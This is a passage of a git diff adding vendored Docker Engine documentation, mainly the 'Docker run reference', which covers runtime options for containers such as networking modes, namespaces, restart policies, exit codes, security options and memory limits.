+Compared to containers, a virtual machine is heavier to run, provides more isolation,
+gets its own set of resources and does minimal sharing.
+
+*Also known as : VM*
diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md
new file mode 100644
index 0000000000..f24c342dfc
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/index.md
@@ -0,0 +1,21 @@
+---
+title: "Engine reference"
+description: "Docker Engine reference"
+keywords: "Engine"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Engine reference
+
+* [Dockerfile reference](builder.md)
+* [Docker run reference](run.md)
+* [Command line reference](commandline/index.md)
+* [API Reference](https://docs.docker.com/engine/api/)
diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md
new file mode 100644
index 0000000000..73769ed610
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/run.md
@@ -0,0 +1,1555 @@
+---
+title: "Docker run reference"
+description: "Configure containers at runtime"
+keywords: "docker, run, configure, runtime"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# Docker run reference
+
+Docker runs processes in isolated containers. A container is a process
+which runs on a host. The host may be local or remote. When an operator
+executes `docker run`, the container process that runs is isolated in
+that it has its own file system, its own networking, and its own
+isolated process tree separate from the host.
+
+This page details how to use the `docker run` command to define the
+container's resources at runtime.
+
+## General form
+
+The basic `docker run` command takes this form:
+
+    $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...]
+
+The `docker run` command must specify an [*IMAGE*](glossary.md#image)
+to derive the container from. An image developer can define image
+defaults related to:
+
+ * detached or foreground running
+ * container identification
+ * network settings
+ * runtime constraints on CPU and memory
+
+With the `docker run [OPTIONS]` an operator can add to or override the
+image defaults set by a developer. And, additionally, operators can
+override nearly all the defaults set by the Docker runtime itself. The
+operator's ability to override image and Docker runtime defaults is why
+[*run*](commandline/run.md) has more options than any
+other `docker` command.
+
+To learn how to interpret the types of `[OPTIONS]`, see [*Option
+types*](commandline/cli.md#option-types).
+
+> **Note**: Depending on your Docker system configuration, you may be
+> required to preface the `docker run` command with `sudo`. To avoid
+> having to use `sudo` with the `docker` command, your system
+> administrator can create a Unix group called `docker` and add users to
+> it. For more information about this configuration, refer to the Docker
+> installation documentation for your operating system.
+
+
+## Operator exclusive options
+
+Only the operator (the person executing `docker run`) can set the
+following options.
+
+ - [Detached vs foreground](#detached-vs-foreground)
+     - [Detached (-d)](#detached--d)
+     - [Foreground](#foreground)
+ - [Container identification](#container-identification)
+     - [Name (--name)](#name---name)
+     - [PID equivalent](#pid-equivalent)
+ - [IPC settings (--ipc)](#ipc-settings---ipc)
+ - [Network settings](#network-settings)
+ - [Restart policies (--restart)](#restart-policies---restart)
+ - [Clean up (--rm)](#clean-up---rm)
+ - [Runtime constraints on resources](#runtime-constraints-on-resources)
+ - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities)
+
+## Detached vs foreground
+
+When starting a Docker container, you must first decide if you want to
+run the container in the background in a "detached" mode or in the
+default foreground mode:
+
+    -d=false: Detached mode: Run container in the background, print new container id
+
+### Detached (-d)
+
+To start a container in detached mode, you use `-d=true` or just `-d` option. By
+design, containers started in detached mode exit when the root process used to
+run the container exits. A container in detached mode cannot be automatically
+removed when it stops, this means you cannot use the `--rm` option with `-d` option.
+
+Do not pass a `service x start` command to a detached container. For example, this
+command attempts to start the `nginx` service.
+
+    $ docker run -d -p 80:80 my_image service nginx start
+
+This succeeds in starting the `nginx` service inside the container. However, it
+fails the detached container paradigm in that, the root process (`service nginx
+start`) returns and the detached container stops as designed. As a result, the
+`nginx` service is started but could not be used. Instead, to start a process
+such as the `nginx` web server do the following:
+
+    $ docker run -d -p 80:80 my_image nginx -g 'daemon off;'
+
+To do input/output with a detached container use network connections or shared
+volumes. These are required because the container is no longer listening to the
+command line where `docker run` was run.
+
+To reattach to a detached container, use `docker`
+[*attach*](commandline/attach.md) command.
+
+### Foreground
+
+In foreground mode (the default when `-d` is not specified), `docker
+run` can start the process in the container and attach the console to
+the process's standard input, output, and standard error. It can even
+pretend to be a TTY (this is what most command line executables expect)
+and pass along signals. All of that is configurable:
+
+    -a=[]           : Attach to `STDIN`, `STDOUT` and/or `STDERR`
+    -t              : Allocate a pseudo-tty
+    --sig-proxy=true: Proxy all received signals to the process (non-TTY mode only)
+    -i              : Keep STDIN open even if not attached
+
+If you do not specify `-a` then Docker will [attach to both stdout and stderr
+]( https://github.com/docker/docker/blob/4118e0c9eebda2412a09ae66e90c34b85fae3275/runconfig/opts/parse.go#L267).
+You can specify to which of the three standard streams (`STDIN`, `STDOUT`,
+`STDERR`) you'd like to connect instead, as in:
+
+    $ docker run -a stdin -a stdout -i -t ubuntu /bin/bash
+
+For interactive processes (like a shell), you must use `-i -t` together in
+order to allocate a tty for the container process. `-i -t` is often written `-it`
+as you'll see in later examples.  Specifying `-t` is forbidden when the client
+standard output is redirected or piped, such as in:
+
+    $ echo test | docker run -i busybox cat
+
+>**Note**: A process running as PID 1 inside a container is treated
+>specially by Linux: it ignores any signal with the default action.
+>So, the process will not terminate on `SIGINT` or `SIGTERM` unless it is
+>coded to do so.
+
+## Container identification
+
+### Name (--name)
+
+The operator can identify a container in three ways:
+
+| Identifier type       | Example value                                                      |
+| --------------------- | ------------------------------------------------------------------ |
+| UUID long identifier  | "f78375b1c487e03c9438c729345e54db9d20cfa2ac1fc3494b6eb60872e74778" |
+| UUID short identifier | "f78375b1c487"                                                     |
+| Name                  | "evil_ptolemy"                                                     |
+
+The UUID identifiers come from the Docker daemon. If you do not assign a
+container name with the `--name` option, then the daemon generates a random
+string name for you. Defining a `name` can be a handy way to add meaning to a
+container. If you specify a `name`, you can use it  when referencing the
+container within a Docker network. This works for both background and foreground
+Docker containers.
+
+> **Note**: Containers on the default bridge network must be linked to
+> communicate by name.
+
+### PID equivalent
+
+Finally, to help with automation, you can have Docker write the
+container ID out to a file of your choosing. This is similar to how some
+programs might write out their process ID to a file (you've seen them as
+PID files):
+
+    --cidfile="": Write the container ID to the file
+
+### Image[:tag]
+
+While not strictly a means of identifying a container, you can specify a version of an
+image you'd like to run the container with by adding `image[:tag]` to the command. For
+example, `docker run ubuntu:14.04`.
+
+### Image[@digest]
+
+Images using the v2 or later image format have a content-addressable identifier
+called a digest. As long as the input used to generate the image is unchanged,
+the digest value is predictable and referenceable.
+
+The following example runs a container from the `alpine` image with the
+`sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0` digest:
+
+    $ docker run alpine@sha256:9cacb71397b640eca97488cf08582ae4e4068513101088e9f96c9814bfda95e0 date
+
+## PID settings (--pid)
+
+    --pid=""  : Set the PID (Process) Namespace mode for the container,
+                 'container:<name|id>': joins another container's PID namespace
+                 'host': use the host's PID namespace inside the container
+
+By default, all containers have the PID namespace enabled.
+
+PID namespace provides separation of processes. The PID Namespace removes the
+view of the system processes, and allows process ids to be reused including
+pid 1.
+
+In certain cases you want your container to share the host's process namespace,
+basically allowing processes within the container to see all of the processes
+on the system.  For example, you could build a container with debugging tools
+like `strace` or `gdb`, but want to use these tools when debugging processes
+within the container.
+
+### Example: run htop inside a container
+
+Create this Dockerfile:
+
+```
+FROM alpine:latest
+RUN apk add --update htop && rm -rf /var/cache/apk/*
+CMD ["htop"]
+```
+
+Build the Dockerfile and tag the image as `myhtop`:
+
+```bash
+$ docker build -t myhtop .
+```
+
+Use the following command to run `htop` inside a container:
+
+```
+$ docker run -it --rm --pid=host myhtop
+```
+
+Joining another container's pid namespace can be used for debugging that container.
+
+### Example
+
+Start a container running a redis server:
+
+```bash
+$ docker run --name my-redis -d redis
+```
+
+Debug the redis container by running another container that has strace in it:
+
+```bash
+$ docker run -it --pid=container:my-redis my_strace_docker_image bash
+$ strace -p 1
+```
+
+## UTS settings (--uts)
+
+    --uts=""  : Set the UTS namespace mode for the container,
+           'host': use the host's UTS namespace inside the container
+
+The UTS namespace is for setting the hostname and the domain that is visible
+to running processes in that namespace.  By default, all containers, including
+those with `--network=host`, have their own UTS namespace.  The `host` setting will
+result in the container using the same UTS namespace as the host.  Note that
+`--hostname` is invalid in `host` UTS mode.
+
+You may wish to share the UTS namespace with the host if you would like the
+hostname of the container to change as the hostname of the host changes.  A
+more advanced use case would be changing the host's hostname from a container.
+
+## IPC settings (--ipc)
+
+    --ipc=""  : Set the IPC mode for the container,
+                 'container:<name|id>': reuses another container's IPC namespace
+                 'host': use the host's IPC namespace inside the container
+
+By default, all containers have the IPC namespace enabled.
+
+IPC (POSIX/SysV IPC) namespace provides separation of named shared memory
+segments, semaphores and message queues.
+
+Shared memory segments are used to accelerate inter-process communication at
+memory speed, rather than through pipes or through the network stack. Shared
+memory is commonly used by databases and custom-built (typically C/OpenMPI,
+C++/using boost libraries) high performance applications for scientific
+computing and financial services industries. If these types of applications
+are broken into multiple containers, you might need to share the IPC mechanisms
+of the containers.
+
+## Network settings
+
+    --dns=[]           : Set custom dns servers for the container
+    --network="bridge" : Connect a container to a network
+                          'bridge': create a network stack on the default Docker bridge
+                          'none': no networking
+                          'container:<name|id>': reuse another container's network stack
+                          'host': use the Docker host network stack
+                          '<network-name>|<network-id>': connect to a user-defined network
+    --network-alias=[] : Add network-scoped alias for the container
+    --add-host=""      : Add a line to /etc/hosts (host:IP)
+    --mac-address=""   : Sets the container's Ethernet device's MAC address
+    --ip=""            : Sets the container's Ethernet device's IPv4 address
+    --ip6=""           : Sets the container's Ethernet device's IPv6 address
+    --link-local-ip=[] : Sets one or more container's Ethernet device's link local IPv4/IPv6 addresses
+
+By default, all containers have networking enabled and they can make any
+outgoing connections. The operator can completely disable networking
+with `docker run --network none` which disables all incoming and outgoing
+networking. In cases like this, you would perform I/O through files or
+`STDIN` and `STDOUT` only.
+
+Publishing ports and linking to other containers only works with the default (bridge). The linking feature is a legacy feature. You should always prefer using Docker network drivers over linking.
+
+Your container will use the same DNS servers as the host by default, but
+you can override this with `--dns`.
+
+By default, the MAC address is generated using the IP address allocated to the
+container. You can set the container's MAC address explicitly by providing a
+MAC address via the `--mac-address` parameter (format:`12:34:56:78:9a:bc`).Be
+aware that Docker does not check if manually specified MAC addresses are unique.
+
+Supported networks :
+
+<table>
+  <thead>
+    <tr>
+      <th class="no-wrap">Network</th>
+      <th>Description</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td class="no-wrap"><strong>none</strong></td>
+      <td>
+        No networking in the container.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>bridge</strong> (default)</td>
+      <td>
+        Connect the container to the bridge via veth interfaces.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>host</strong></td>
+      <td>
+        Use the host's network stack inside the container.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>container</strong>:&lt;name|id&gt;</td>
+      <td>
+        Use the network stack of another container, specified via
+        its <i>name</i> or <i>id</i>.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>NETWORK</strong></td>
+      <td>
+        Connects the container to a user created network (using <code>docker network create</code> command)
+      </td>
+    </tr>
+  </tbody>
+</table>
+
+#### Network: none
+
+With the network is `none` a container will not have
+access to any external routes.  The container will still have a
+`loopback` interface enabled in the container but it does not have any
+routes to external traffic.
+
+#### Network: bridge
+
+With the network set to `bridge` a container will use docker's
+default networking setup.  A bridge is setup on the host, commonly named
+`docker0`, and a pair of `veth` interfaces will be created for the
+container.  One side of the `veth` pair will remain on the host attached
+to the bridge while the other side of the pair will be placed inside the
+container's namespaces in addition to the `loopback` interface.  An IP
+address will be allocated for containers on the bridge's network and
+traffic will be routed though this bridge to the container.
+
+Containers can communicate via their IP addresses by default. To communicate by
+name, they must be linked.
+
+#### Network: host
+
+With the network set to `host` a container will share the host's
+network stack and all interfaces from the host will be available to the
+container.  The container's hostname will match the hostname on the host
+system. Note that `--mac-address` is invalid in `host` netmode. Even in `host`
+network mode a container has its own UTS namespace by default. As such
+`--hostname` is allowed in `host` network mode and will only change the
+hostname inside the container.
+Similar to `--hostname`, the `--add-host`, `--dns`, `--dns-search`, and
+`--dns-option` options can be used in `host` network mode. These options update
+`/etc/hosts` or `/etc/resolv.conf` inside the container. No change are made to
+`/etc/hosts` and `/etc/resolv.conf` on the host.
+
+Compared to the default `bridge` mode, the `host` mode gives *significantly*
+better networking performance since it uses the host's native networking stack
+whereas the bridge has to go through one level of virtualization through the
+docker daemon. It is recommended to run containers in this mode when their
+networking performance is critical, for example, a production Load Balancer
+or a High Performance Web Server.
+
+> **Note**: `--network="host"` gives the container full access to local system
+> services such as D-bus and is therefore considered insecure.
+
+#### Network: container
+
+With the network set to `container` a container will share the
+network stack of another container.  The other container's name must be
+provided in the format of `--network container:<name|id>`. Note that `--add-host`
+`--hostname` `--dns` `--dns-search` `--dns-option` and `--mac-address` are
+invalid in `container` netmode, and `--publish` `--publish-all` `--expose` are
+also invalid in `container` netmode.
+
+Example running a Redis container with Redis binding to `localhost` then
+running the `redis-cli` command and connecting to the Redis server over the
+`localhost` interface.
+
+    $ docker run -d --name redis example/redis --bind 127.0.0.1
+    $ # use the redis container's network stack to access localhost
+    $ docker run --rm -it --network container:redis example/redis-cli -h 127.0.0.1
+
+#### User-defined network
+
+You can create a network using a Docker network driver or an external network
+driver plugin. You can connect multiple containers to the same network. Once
+connected to a user-defined network, the containers can communicate easily using
+only another container's IP address or name.
+
+For `overlay` networks or custom plugins that support multi-host connectivity,
+containers connected to the same multi-host network but launched from different
+Engines can also communicate in this way.
+
+The following example creates a network using the built-in `bridge` network
+driver and running a container in the created network
+
+```
+$ docker network create -d bridge my-net
+$ docker run --network=my-net -itd --name=container3 busybox
+```
+
+### Managing /etc/hosts
+
+Your container will have lines in `/etc/hosts` which define the hostname of the
+container itself as well as `localhost` and a few other common things. The
+`--add-host` flag can be used to add additional lines to `/etc/hosts`.
+
+    $ docker run -it --add-host db-static:86.75.30.9 ubuntu cat /etc/hosts
+    172.17.0.22     09d03f76bf2c
+    fe00::0         ip6-localnet
+    ff00::0         ip6-mcastprefix
+    ff02::1         ip6-allnodes
+    ff02::2         ip6-allrouters
+    127.0.0.1       localhost
+    ::1	            localhost ip6-localhost ip6-loopback
+    86.75.30.9      db-static
+
+If a container is connected to the default bridge network and `linked`
+with other containers, then the container's `/etc/hosts` file is updated
+with the linked container's name.
+
+If the container is connected to user-defined network, the container's
+`/etc/hosts` file is updated with names of all other containers in that
+user-defined network.
+
+> **Note** Since Docker may live update the container’s `/etc/hosts` file, there
+may be situations when processes inside the container can end up reading an
+empty or incomplete `/etc/hosts` file. In most cases, retrying the read again
+should fix the problem.
+
+## Restart policies (--restart)
+
+Using the `--restart` flag on Docker run you can specify a restart policy for
+how a container should or should not be restarted on exit.
+
+When a restart policy is active on a container, it will be shown as either `Up`
+or `Restarting` in [`docker ps`](commandline/ps.md). It can also be
+useful to use [`docker events`](commandline/events.md) to see the
+restart policy in effect.
+
+Docker supports the following restart policies:
+
+<table>
+  <thead>
+    <tr>
+      <th>Policy</th>
+      <th>Result</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td><strong>no</strong></td>
+      <td>
+        Do not automatically restart the container when it exits. This is the
+        default.
+      </td>
+    </tr>
+    <tr>
+      <td>
+        <span style="white-space: nowrap">
+          <strong>on-failure</strong>[:max-retries]
+        </span>
+      </td>
+      <td>
+        Restart only if the container exits with a non-zero exit status.
+        Optionally, limit the number of restart retries the Docker
+        daemon attempts.
+      </td>
+    </tr>
+    <tr>
+      <td><strong>always</strong></td>
+      <td>
+        Always restart the container regardless of the exit status.
+        When you specify always, the Docker daemon will try to restart
+        the container indefinitely. The container will also always start
+        on daemon startup, regardless of the current state of the container.
+      </td>
+    </tr>
+    <tr>
+      <td><strong>unless-stopped</strong></td>
+      <td>
+        Always restart the container regardless of the exit status, but
+        do not start it on daemon startup if the container has been put
+        to a stopped state before.
+      </td>
+    </tr>
+  </tbody>
+</table>
+
+An ever increasing delay (double the previous delay, starting at 100
+milliseconds) is added before each restart to prevent flooding the server.
+This means the daemon will wait for 100 ms, then 200 ms, 400, 800, 1600,
+and so on until either the `on-failure` limit is hit, or when you `docker stop`
+or `docker rm -f` the container.
+
+If a container is successfully restarted (the container is started and runs
+for at least 10 seconds), the delay is reset to its default value of 100 ms.
+
+You can specify the maximum amount of times Docker will try to restart the
+container when using the **on-failure** policy.  The default is that Docker
+will try forever to restart the container. The number of (attempted) restarts
+for a container can be obtained via [`docker inspect`](commandline/inspect.md). For example, to get the number of restarts
+for container "my-container";
+
+    {% raw %}
+    $ docker inspect -f "{{ .RestartCount }}" my-container
+    # 2
+    {% endraw %}
+
+Or, to get the last time the container was (re)started;
+
+    {% raw %}
+    $ docker inspect -f "{{ .State.StartedAt }}" my-container
+    # 2015-03-04T23:47:07.691840179Z
+    {% endraw %}
+
+
+Combining `--restart` (restart policy) with the `--rm` (clean up) flag results
+in an error. On container restart, attached clients are disconnected. See the
+examples on using the [`--rm` (clean up)](#clean-up-rm) flag later in this page.
+
+### Examples
+
+    $ docker run --restart=always redis
+
+This will run the `redis` container with a restart policy of **always**
+so that if the container exits, Docker will restart it.
+
+    $ docker run --restart=on-failure:10 redis
+
+This will run the `redis` container with a restart policy of **on-failure**
+and a maximum restart count of 10.  If the `redis` container exits with a
+non-zero exit status more than 10 times in a row Docker will abort trying to
+restart the container. Providing a maximum restart limit is only valid for the
+**on-failure** policy.
+
+## Exit Status
+
+The exit code from `docker run` gives information about why the container
+failed to run or why it exited.  When `docker run` exits with a non-zero code,
+the exit codes follow the `chroot` standard, see below:
+
+**_125_** if the error is with Docker daemon **_itself_**
+
+    $ docker run --foo busybox; echo $?
+    # flag provided but not defined: --foo
+      See 'docker run --help'.
+      125
+
+**_126_** if the **_contained command_** cannot be invoked
+
+    $ docker run busybox /etc; echo $?
+    # docker: Error response from daemon: Container command '/etc' could not be invoked.
+      126
+
+**_127_** if the **_contained command_** cannot be found
+
+    $ docker run busybox foo; echo $?
+    # docker: Error response from daemon: Container command 'foo' not found or does not exist.
+      127
+
+**_Exit code_** of **_contained command_** otherwise
+
+    $ docker run busybox /bin/sh -c 'exit 3'; echo $?
+    # 3
+
+## Clean up (--rm)
+
+By default a container's file system persists even after the container
+exits. This makes debugging a lot easier (since you can inspect the
+final state) and you retain all your data by default. But if you are
+running short-term **foreground** processes, these container file
+systems can really pile up. If instead you'd like Docker to
+**automatically clean up the container and remove the file system when
+the container exits**, you can add the `--rm` flag:
+
+    --rm=false: Automatically remove the container when it exits (incompatible with -d)
+
+> **Note**: When you set the `--rm` flag, Docker also removes the volumes
+associated with the container when the container is removed. This is similar
+to running `docker rm -v my-container`. Only volumes that are specified without a
+name are removed. For example, with
+`docker run --rm -v /foo -v awesome:/bar busybox top`, the volume for `/foo` will be removed,
+but the volume for `/bar` will not. Volumes inherited via `--volumes-from` will be removed
+with the same logic -- if the original volume was specified with a name it will **not** be removed.
+
+## Security configuration
+    --security-opt="label=user:USER"     : Set the label user for the container
+    --security-opt="label=role:ROLE"     : Set the label role for the container
+    --security-opt="label=type:TYPE"     : Set the label type for the container
+    --security-opt="label=level:LEVEL"   : Set the label level for the container
+    --security-opt="label=disable"       : Turn off label confinement for the container
+    --security-opt="apparmor=PROFILE"    : Set the apparmor profile to be applied to the container
+    --security-opt="no-new-privileges"   : Disable container processes from gaining new privileges
+    --security-opt="seccomp=unconfined"  : Turn off seccomp confinement for the container
+    --security-opt="seccomp=profile.json": White listed syscalls seccomp Json file to be used as a seccomp filter
+
+
+You can override the default labeling scheme for each container by specifying
+the `--security-opt` flag. Specifying the level in the following command
+allows you to share the same content between containers.
+
+    $ docker run --security-opt label=level:s0:c100,c200 -it fedora bash
+
+> **Note**: Automatic translation of MLS labels is not currently supported.
+
+To disable the security labeling for this container versus running with the
+`--privileged` flag, use the following command:
+
+    $ docker run --security-opt label=disable -it fedora bash
+
+If you want a tighter security policy on the processes within a container,
+you can specify an alternate type for the container. You could run a container
+that is only allowed to listen on Apache ports by executing the following
+command:
+
+    $ docker run --security-opt label=type:svirt_apache_t -it centos bash
+
+> **Note**: You would have to write policy defining a `svirt_apache_t` type.
+
+If you want to prevent your container processes from gaining additional
+privileges, you can execute the following command:
+
+    $ docker run --security-opt no-new-privileges -it centos bash
+
+This means that commands that raise privileges such as `su` or `sudo` will no longer work.
+It also causes any seccomp filters to be applied later, after privileges have been dropped
+which may mean you can have a more restrictive set of filters.
+For more details, see the [kernel documentation](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt).
+
+## Specifying custom cgroups
+
+Using the `--cgroup-parent` flag, you can pass a specific cgroup to run a
+container in. This allows you to create and manage cgroups on their own. You can
+define custom resources for those cgroups and put containers under a common
+parent group.
+
+## Runtime constraints on resources
+
+The operator can also adjust the performance parameters of the
+container:
+
+| Option                     |  Description                                                                                                                                    |
+| -------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- |
+| `-m`, `--memory=""`        | Memory limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M.               |
+| `--memory-swap=""`         | Total memory limit (memory + swap, format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`.         |
+| `--memory-reservation=""`  | Memory soft limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`.                         |
+| `--kernel-memory=""`       | Kernel memory limit (format: `<number>[<unit>]`). Number is a positive integer. Unit can be one of `b`, `k`, `m`, or `g`. Minimum is 4M.        |
+| `-c`, `--cpu-shares=0`     | CPU shares (relative weight)                                                                                                                    |
+| `--cpus=0.000`             | Number of CPUs. Number is a fractional number. 0.000 means no limit.                                                                            |
+| `--cpu-period=0`           | Limit the CPU CFS (Completely Fair Scheduler) period                                                                                            |
+| `--cpuset-cpus=""`         | CPUs in which to allow execution (0-3, 0,1)                                                                                                     |
+| `--cpuset-mems=""`         | Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.                                                     |
+| `--cpu-quota=0`            | Limit the CPU CFS (Completely Fair Scheduler) quota                                                                                             |
+| `--cpu-rt-period=0`        | Limit the CPU real-time period. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits.    |
+| `--cpu-rt-runtime=0`       | Limit the CPU real-time runtime. In microseconds. Requires parent cgroups be set and cannot be higher than parent. Also check rtprio ulimits.   |
+| `--blkio-weight=0`         | Block IO weight (relative weight) accepts a weight value between 10 and 1000.                                                                   |
+| `--blkio-weight-device=""` | Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`)                                                                          |
+| `--device-read-bps=""`     | Limit read rate from a device (format: `<device-path>:<number>[<unit>]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`. |
+| `--device-write-bps=""`    | Limit write rate to a device (format: `<device-path>:<number>[<unit>]`). Number is a positive integer. Unit can be one of `kb`, `mb`, or `gb`.  |
+| `--device-read-iops="" `   | Limit read rate (IO per second) from a device (format: `<device-path>:<number>`). Number is a positive integer.                                 |
+| `--device-write-iops="" `  | Limit write rate (IO per second) to a device (format: `<device-path>:<number>`). Number is a positive integer.                                  |
+| `--oom-kill-disable=false` | Whether to disable OOM Killer for the container or not.                                                                                         |
+| `--oom-score-adj=0`        | Tune container's OOM preferences (-1000 to 1000)                                                                                                |
+| `--memory-swappiness=""`   | Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.                                                            |
+| `--shm-size=""`            | Size of `/dev/shm`. The format is `<number><unit>`. `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. |
+
+### User memory constraints
+
+We have four ways to set user memory usage:
+
+<table>
+  <thead>
+    <tr>
+      <th>Option</th>
+      <th>Result</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td class="no-wrap">
+          <strong>memory=inf, memory-swap=inf</strong> (default)
+      </td>
+      <td>
+        There is no memory limit for the container. The container can use
+        as much memory as needed.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>memory=L&lt;inf, memory-swap=inf</strong></td>
+      <td>
+        (specify memory and set memory-swap as <code>-1</code>) The container is
+        not allowed to use more than L bytes of memory, but can use as much swap
+        as is needed (if the host supports swap memory).
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>memory=L&lt;inf, memory-swap=2*L</strong></td>
+      <td>
+        (specify memory without memory-swap) The container is not allowed to
+        use more than L bytes of memory, swap <i>plus</i> memory usage is double
+        of that.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap">
+          <strong>memory=L&lt;inf, memory-swap=S&lt;inf, L&lt;=S</strong>
+      </td>
+      <td>
+        (specify both memory and memory-swap) The container is not allowed to
+        use more than L bytes of memory, swap <i>plus</i> memory usage is limited
+        by S.
+      </td>
+    </tr>
+  </tbody>
+</table>
+
+Examples:
+
+    $ docker run -it ubuntu:14.04 /bin/bash
+
+We set nothing about memory, this means the processes in the container can use
+as much memory and swap memory as they need.
+
+    $ docker run -it -m 300M --memory-swap -1 ubuntu:14.04 /bin/bash
+
+We set memory limit and disabled swap memory limit, this means the processes in
+the container can use 300M memory and as much swap memory as they need (if the
+host supports swap memory).
+
+    $ docker run -it -m 300M ubuntu:14.04 /bin/bash
+
+We set memory limit only, this means the processes in the container can use
+300M memory and 300M swap memory, by default, the total virtual memory size
+(--memory-swap) will be set as double of memory, in this case, memory + swap
+would be 2*300M, so processes can use 300M swap memory as well.
+
+    $ docker run -it -m 300M --memory-swap 1G ubuntu:14.04 /bin/bash
+
+We set both memory and swap memory, so the processes in the container can use
+300M memory and 700M swap memory.
+
+Memory reservation is a kind of memory soft limit that allows for greater
+sharing of memory. Under normal circumstances, containers can use as much of
+the memory as needed and are constrained only by the hard limits set with the
+`-m`/`--memory` option. When memory reservation is set, Docker detects memory
+contention or low memory and forces containers to restrict their consumption to
+a reservation limit.
+
+Always set the memory reservation value below the hard limit, otherwise the hard
+limit takes precedence. A reservation of 0 is the same as setting no
+reservation. By default (without reservation set), memory reservation is the
+same as the hard memory limit.
+
+Memory reservation is a soft-limit feature and does not guarantee the limit
+won't be exceeded. Instead, the feature attempts to ensure that, when memory is
+heavily contended for, memory is allocated based on the reservation hints/setup.
+
+The following example limits the memory (`-m`) to 500M and sets the memory
+reservation to 200M.
+
+```bash
+$ docker run -it -m 500M --memory-reservation 200M ubuntu:14.04 /bin/bash
+```
+
+Under this configuration, when the container consumes memory more than 200M and
+less than 500M, the next system memory reclaim attempts to shrink container
+memory below 200M.
+
+The following example set memory reservation to 1G without a hard memory limit.
+
+```bash
+$ docker run -it --memory-reservation 1G ubuntu:14.04 /bin/bash
+```
+
+The container can use as much memory as it needs. The memory reservation setting
+ensures the container doesn't consume too much memory for long time, because
+every memory reclaim shrinks the container's consumption to the reservation.
+
+By default, kernel kills processes in a container if an out-of-memory (OOM)
+error occurs. To change this behaviour, use the `--oom-kill-disable` option.
+Only disable the OOM killer on containers where you have also set the
+`-m/--memory` option. If the `-m` flag is not set, this can result in the host
+running out of memory and require killing the host's system processes to free
+memory.
+
+The following example limits the memory to 100M and disables the OOM killer for
+this container:
+
+    $ docker run -it -m 100M --oom-kill-disable ubuntu:14.04 /bin/bash
+
+The following example, illustrates a dangerous way to use the flag:
+
+    $ docker run -it --oom-kill-disable ubuntu:14.04 /bin/bash
+
+The container has unlimited memory which can cause the host to run out memory
+and require killing system processes to free memory. The `--oom-score-adj`
+parameter can be changed to select the priority of which containers will
+be killed when the system is out of memory, with negative scores making them
+less likely to be killed an positive more likely.
+
+### Kernel memory constraints
+
+Kernel memory is fundamentally different than user memory as kernel memory can't
+be swapped out. The inability to swap makes it possible for the container to
+block system services by consuming too much kernel memory. Kernel memory includes：
+
+ - stack pages
+ - slab pages
+ - sockets memory pressure
+ - tcp memory pressure
+
+You can setup kernel memory limit to constrain these kinds of memory. For example,
+every process consumes some stack pages. By limiting kernel memory, you can
+prevent new processes from being created when the kernel memory usage is too high.
+
+Kernel memory is never completely independent of user memory. Instead, you limit
+kernel memory in the context of the user memory limit. Assume "U" is the user memory
+limit and "K" the kernel limit. There are three possible ways to set limits:
+
+<table>
+  <thead>
+    <tr>
+      <th>Option</th>
+      <th>Result</th>
+    </tr>
+  </thead>
+  <tbody>
+    <tr>
+      <td class="no-wrap"><strong>U != 0, K = inf</strong> (default)</td>
+      <td>
+        This is the standard memory limitation mechanism already present before using
+        kernel memory. Kernel memory is completely ignored.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>U != 0, K &lt; U</strong></td>
+      <td>
+        Kernel memory is a subset of the user memory. This setup is useful in
+        deployments where the total amount of memory per-cgroup is overcommitted.
+        Overcommitting kernel memory limits is definitely not recommended, since the
+        box can still run out of non-reclaimable memory.
+        In this case, you can configure K so that the sum of all groups is
+        never greater than the total memory. Then, freely set U at the expense of
+        the system's service quality.
+      </td>
+    </tr>
+    <tr>
+      <td class="no-wrap"><strong>U != 0, K &gt; U</strong></td>
+      <td>
+        Since kernel memory charges are also fed to the user counter and reclamation
+        is triggered for the container for both kinds of memory. This configuration
+        gives the admin a unified view of memory. It is also useful for people
